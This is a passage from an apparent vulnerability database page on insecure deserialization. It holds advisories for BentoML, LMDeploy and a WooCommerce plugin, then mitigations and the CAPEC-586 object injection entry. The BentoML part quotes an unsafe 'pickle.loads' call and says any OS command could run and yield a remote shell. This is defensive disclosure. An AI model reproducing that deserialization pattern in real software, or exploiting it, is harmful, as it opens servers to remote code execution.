ext.NpNDArray:\n format = payload.meta.get(\"format\", \"default\")\n if format == \"default\":\n return pickle.loads(payload.data)\n```\n### Impact\nIn the above Proof of Concept, I have shown how the attacker can execute command **id** and send the output of the command to the outside. By replacing **id** command with any OS commands, this insecure deserialization in BentoML\u0027s runner server will grant the attacker the permission to gain the remote shell on the server and injecting backdoors to persist access.",
"id": "GHSA-7v4r-c989-xh26",
"modified": "2025-04-23T15:24:05Z",
"published": "2025-04-09T12:59:45Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/bentoml/BentoML/security/advisories/GHSA-7v4r-c989-xh26"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-32375"
},
{
"type": "PACKAGE",
"url": "https://github.com/bentoml/BentoML"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/bentoml/PYSEC-2025-32.yaml"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "BentoML\u0027s runner server Vulnerable to Remote Code Execution (RCE) via Insecure Deserialization"
}
GHSA-7VC5-MJWP-C8FQ
Vulnerability from github – Published: 2025-04-03 15:31 – Updated: 2025-04-24 14:36A vulnerability was found in InternLM LMDeploy up to 0.7.1. It has been classified as critical. Affected is the function load_weight_ckpt of the file lmdeploy/lmdeploy/vl/model/utils.py of the component PT File Handler. The manipulation leads to deserialization. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "lmdeploy"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "0.7.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-3162"
],
"database_specific": {
"cwe_ids": [
"CWE-20",
"CWE-502"
],
"github_reviewed": true,
"github_reviewed_at": "2025-04-04T14:26:00Z",
"nvd_published_at": "2025-04-03T15:15:53Z",
"severity": "MODERATE"
},
"details": "A vulnerability was found in InternLM LMDeploy up to 0.7.1. It has been classified as critical. Affected is the function load_weight_ckpt of the file lmdeploy/lmdeploy/vl/model/utils.py of the component PT File Handler. The manipulation leads to deserialization. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used.",
"id": "GHSA-7vc5-mjwp-c8fq",
"modified": "2025-04-24T14:36:52Z",
"published": "2025-04-03T15:31:20Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-3162"
},
{
"type": "WEB",
"url": "https://github.com/InternLM/lmdeploy/issues/3255"
},
{
"type": "WEB",
"url": "https://github.com/InternLM/lmdeploy/issues/3255#issue-2918985270"
},
{
"type": "PACKAGE",
"url": "https://github.com/InternLM/lmdeploy"
},
{
"type": "WEB",
"url": "https://vuldb.com/?ctiid.303108"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.303108"
},
{
"type": "WEB",
"url": "https://vuldb.com/?submit.542520"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "LMDeploy Improper Input Validation Vulnerability"
}
GHSA-7VCJ-MH9G-5WJ9
Vulnerability from github – Published: 2025-04-01 06:30 – Updated: 2026-04-01 18:34Deserialization of Untrusted Data vulnerability in silverplugins217 Multiple Shipping And Billing Address For Woocommerce allows Object Injection. This issue affects Multiple Shipping And Billing Address For Woocommerce: from n/a through 1.5.
{
"affected": [],
"aliases": [
"CVE-2025-31087"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-04-01T06:15:56Z",
"severity": "CRITICAL"
},
"details": "Deserialization of Untrusted Data vulnerability in silverplugins217 Multiple Shipping And Billing Address For Woocommerce allows Object Injection. This issue affects Multiple Shipping And Billing Address For Woocommerce: from n/a through 1.5.",
"id": "GHSA-7vcj-mh9g-5wj9",
"modified": "2026-04-01T18:34:19Z",
"published": "2025-04-01T06:30:48Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-31087"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/wordpress/plugin/different-shipping-and-billing-address-for-woocommerce/vulnerability/wordpress-multiple-shipping-and-billing-address-for-woocommerce-1-5-php-object-injection-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
Mitigation
If available, use the signing/sealing features of the programming language to assure that deserialized data has not been tainted. For example, a hash-based message authentication code (HMAC) could be used to ensure that data has not been modified.
Mitigation
When deserializing data, populate a new object rather than just deserializing. The result is that the data flows through safe input validation and that the functions are safe.
Mitigation
Explicitly define a final object() to prevent deserialization.
Mitigation
- Make fields transient to protect them from deserialization.
- An attempt to serialize and then deserialize a class containing transient fields will result in NULLs where the transient data should be. This is an excellent way to prevent time, environment-based, or sensitive variables from being carried over and used improperly.
Mitigation
Avoid having unnecessary types or gadgets (a sequence of instances and method invocations that can self-execute during the deserialization process, often found in libraries) available that can be leveraged for malicious ends. This limits the potential for unintended or unauthorized types and gadgets to be leveraged by the attacker. Add only acceptable classes to an allowlist. Note: new gadgets are constantly being discovered, so this alone is not a sufficient mitigation.
Mitigation
Employ cryptography of the data or code for protection. However, it's important to note that it would still be client-side security. This is risky because if the client is compromised then the security implemented on the client (the cryptography) can be bypassed.
Mitigation MIT-29
Strategy: Firewall
Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth [REF-1481].
CAPEC-586: Object Injection
An adversary attempts to exploit an application by injecting additional, malicious content during its processing of serialized objects. Developers leverage serialization in order to convert data or state into a static, binary format for saving to disk or transferring over a network. These objects are then deserialized when needed to recover the data/state. By injecting a malformed object into a vulnerable application, an adversary can potentially compromise the application by manipulating the deserialization process. This can result in a number of unwanted outcomes, including remote code execution.